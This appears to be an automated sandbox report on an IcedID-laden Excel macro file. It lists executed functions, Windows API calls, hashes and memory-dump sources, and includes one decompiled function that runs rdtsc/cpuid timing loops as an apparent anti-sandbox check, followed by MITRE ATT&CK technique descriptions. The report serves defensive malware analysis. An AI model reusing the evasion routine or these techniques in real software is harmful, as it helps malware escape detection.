String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
API String ID: 4275171209-1517691801
Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 000007FEF8FB11EC
GetThreadPriority.KERNEL32 ref: 000007FEF8FB11FA
GetCurrentThread.KERNEL32 ref: 000007FEF8FB1204
CreateThread.KERNEL32 ref: 000007FEF8FB123C
WaitForSingleObject.KERNEL32 ref: 000007FEF8FB124F
DuplicateHandle.KERNEL32 ref: 000007FEF8FB128D

Strings

G, xrefs: 000007FEF8FB12DF
DllRegisterServer, xrefs: 000007FEF8FB12F6
_, xrefs: 000007FEF8FB1293

Memory Dump Source

Source File: 00000004.00000002.2091049355.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2091045131.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091053781.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091060199.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091064010.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
String ID: DllRegisterServer$G$_
API String ID: 1174013218-1650116920
Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000007FEF8FB220B

Strings

@, xrefs: 000007FEF8FB21E1

Memory Dump Source

Source File: 00000004.00000002.2091049355.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2091045131.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091053781.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091060199.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091064010.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: @
API String ID: 4275171209-2766056989
Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01

Uniqueness

Uniqueness Score: -1.00%

Function 021010AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 021010B7
RtlExitUserProcess.NTDLL ref: 021010C8

Memory Dump Source

Source File: 00000004.00000002.2087554555.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: true

Similarity

API ID: ExitProcessSleepUser
String ID:
API String ID: 354099737-0
Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
Instruction ID: c27b723680555bcc729529c80e36801374a00955e8a798868bb78501eea1b2a0
Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
Instruction Fuzzy Hash: ABC01230500280E2F21DAB60A8CCBA82225B320309F010619834A256E88FBC00C8C602

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000007FEF8FB327B

Memory Dump Source

Source File: 00000004.00000002.2091049355.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2091045131.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091053781.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091060199.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091064010.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40

Uniqueness

Uniqueness Score: -1.00%

Function 0210260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,02101E13), ref: 0210264B

Memory Dump Source

Source File: 00000004.00000002.2087554555.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: true

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
Instruction ID: d98e6ffeebab7f5ec5b3bb5885b2ce453791e4d1db3a9a0996b74ffa400d6c40
Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
Instruction Fuzzy Hash: ECE09232720541C2DF10EB20E8C87D97321FBA8704F844222895E026A8EFACD69EC740

Uniqueness

Uniqueness Score: -1.00%

Function 02101000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 02101022

Memory Dump Source

Source File: 00000004.00000002.2087554555.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: true

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
Instruction ID: 4bcc624ed2f71124a07fb452ceba1dda4c8db66986b9a6186459de56babf2e1f
Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
Instruction Fuzzy Hash: 4BD0A772E1024083F7309710EADA7D92311F3A4315F808206C58D44558CFBCC198CA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON

Download Yara Rule

Strings

%, xrefs: 000007FEF8FB17B2

Memory Dump Source

Source File: 00000004.00000002.2091049355.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2091045131.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091053781.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091060199.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091064010.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2091049355.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2091045131.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091053781.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091060199.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091064010.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02101E50, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E02101E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}

0x02101e50
0x02101e50
0x02101e50
0x02101e50
0x02101e55
0x02101e5a
0x02101e5f
0x02101e60
0x02101e6b
0x02101e6b
0x02101e71
0x02101e73
0x02101e84
0x02101e86
0x02101e8a
0x02101e8e
0x02101e92
0x02101e96
0x02101e98
0x02101e9f
0x02101ea2
0x02101ea5
0x02101eab
0x02101ead
0x02101eb8
0x02101eba
0x02101ec1
0x02101ec4
0x02101ec7
0x02101ec7
0x02101ee9

Memory Dump Source

Source File: 00000004.00000002.2087554555.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
Instruction ID: 24b4097773df51f77df0e76f1779d083ea42d79a283a0675e88dfa3212b5c7af
Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
Instruction Fuzzy Hash: 05019E72B24A908ADF248F26B644389B6A2E38D7C0F148535EB9C43B18DA3CD0958B04

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report uhr908723097306.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: IcedID

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Function 021027BC, Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Function 02102434, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 02101E50, Relevance: .0, Instructions: 47
COMMON